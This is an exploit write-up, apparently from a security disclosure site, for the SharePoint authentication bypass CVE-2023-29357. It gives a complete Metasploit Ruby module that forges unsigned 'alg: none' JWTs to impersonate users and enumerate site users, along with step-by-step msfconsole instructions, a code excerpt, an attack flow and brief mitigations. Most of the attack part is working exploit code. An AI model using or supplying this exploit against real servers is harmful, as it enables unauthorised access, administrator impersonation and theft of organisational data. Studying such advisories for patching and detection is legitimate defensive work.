Microsoft Sharepoint Authentication Bypass
Microsoft Sharepoint Authentication Bypass
Microsoft Sharepoint Authentication Bypass

=============================================================================================================================================
| # Title Microsoft Sharepoint Authentication Bypass

=============================================================================================================================================
| # Title : SharePoint Authentication Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration |
=============================================================================================================================================

POC :

1. Summary :
a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE?2023?29357. (https://packetstorm.news/files/id/207960/)
The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user,
including Site Administrators, without possessing valid credentials.
The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.


-------------------------
How to Run the Exploit
-------------------------

### **1. Save the script**

Save the code as:

~/.msf4/modules/auxiliary/sharepoint/cve_2023_29357.rb


### **2. Start it from terminal**

msfconsole
use auxiliary/sharepoint/cve_2023_29357
set RHOSTS https://target.com
run

-------------------------
auxiliary :
-------------------------
##
# CVE?2023?29357 SharePoint Auth Bypass
# by Indoushka
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'SharePoint Auth Bypass (CVE?2023?29357)',
'Description' => %q{
This module exploits an authentication bypass in Microsoft SharePoint
(CVE?2023?29357) using a crafted JWT token with "alg":"none".
},
'Author' => [
'Indoushka (Conversion to MSF)'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-29357']
]
))

register_options(
[
OptString.new('TARGETURI', [ true, 'Base SharePoint URL', '/' ])
]
)
end

def create_jwt(aud, client_id)
header = { alg: 'none' }
now = Time.now.to_i
payload = {
aud: aud,
iss: client_id,
nbf: now,
exp: now + 3600,
ver: "hashedprooftoken",
nameid: "#{client_id}@#{aud.split('@')[1]}",
endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
endpointurlLength: 1,
isloopback: true
}

encoded_header = Rex::Text.encode_base64url(header.to_json)
encoded_payload = Rex::Text.encode_base64url(payload.to_json)

"#{encoded_header}.#{encoded_payload}.AAA"
end

def get_realm
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "_api/web/siteusers"),
'headers' => { 'Authorization' => 'Bearer ' }
}, 3)

return nil unless res&.code == 401

auth = res.headers['WWW-Authenticate']
return nil unless auth

realm = auth[/realm=\"([^\"]+)\"/, 1]
realm
end

def run
client_id = "00000003-0000-0ff1-ce00-000000000000"
print_status("[*] Fetching realm?")

realm = get_realm

if realm.nil?
print_error("[-] Failed to extract realm")
return
end

print_good("[+] Realm: #{realm}")

aud = "#{client_id}@#{realm}"
jwt = create_jwt(aud, client_id)

print_status("[*] Trying authentication bypass?")

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "_api/web/siteusers"),
'headers' => {
'Authorization' => "Bearer #{jwt}",
'X-PROOF_TOKEN' => jwt,
'Accept' => 'application/json'
}
}, 5)

if res && res.code == 200
print_good("[+] Authentication bypass success!")
if res.body
print_line(res.body)
end
else
print_error("[-] Bypass failed. HTTP #{res&.code}")
end
end
end

---------------------------------------------------------------------------------------------------------
[ Technical Description ]
---------------------------------------------------------------------------------------------------------

? The attacker sends a request to:
https://TARGET/_api/web/siteusers
This forces SharePoint to respond with a 401 and expose the Realm value.

? The Realm is extracted from the ?WWW?Authenticate? header:
Bearer realm="XXXXXXXXXXXXXXXXXXXXXXXXXXXX"

? The attacker forges a JWT token with:
{ "alg": "none" }

? The ?aud? field is constructed as:
00000003-0000-0ff1-ce00-000000000000@REALM

? The forged token is sent to SharePoint REST API endpoints.

? SharePoint incorrectly validates the token and treats the attacker as an authenticated user.
The following module performs:

1. Realm extraction
2. Token forgery
3. Authentication bypass
4. Admin enumeration
5. Privilege validation

Core logic excerpt (Metasploit Ruby):

jwt_header = { alg: "none" }.to_json
jwt_payload = {
aud: "#{client_id}@#{realm}",
iss: client_id,
nbf: Time.now.to_i,
exp: Time.now.to_i + 3600,
ver: "hashedprooftoken",
nameid: "#{client_id}@#{realm}",
endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
endpointurlLength: 1,
isloopback: true
}.to_json

unsigned_token = "#{b64(jwt_header)}.#{b64(jwt_payload)}.AAA"

send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('_api', 'web', 'currentuser'),
'headers' => {
"Authorization" => "Bearer #{unsigned_token}",
"X-PROOF_TOKEN" => unsigned_token
}
})

---------------------------------------------------------------------------------------------------------
[ Attack Flow ]
---------------------------------------------------------------------------------------------------------

1. Force 401 ? Extract Realm
2. Build forged JWT
3. Bypass authentication
4. Enumerate site admins
5. Optional: Impersonate admin (SharePoint accepts spoofing)
6. Dump internal API data

---------------------------------------------------------------------------------------------------------
[ Impact ]
---------------------------------------------------------------------------------------------------------

? Full user enumeration
? Admin identification
? Access to restricted SharePoint API routes
? Potential privilege escalation
? Ability to chain with RCE vulnerabilities (CVE?2023?24955)
? Data leakage (lists, documents, users, groups?)

Severity: **CRITICAL**

---------------------------------------------------------------------------------------------------------
[ Mitigation ]
---------------------------------------------------------------------------------------------------------

? Install the official Microsoft patch
? Enforce strict JWT signature verification
? Reject any token with "alg:none"
? Disable loopback trust token mode
? Monitor ULS logs for abnormal access patterns

---------------------------------------------------------------------------------------------------------
[ Conclusion ]
---------------------------------------------------------------------------------------------------------

CVE?2023?29357 is a severe authentication bypass allowing attackers to impersonate
any SharePoint user without credentials.
The vulnerability is trivial to exploit and provides high?value access to internal
SharePoint data and admin functions.

Patch immediately.

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.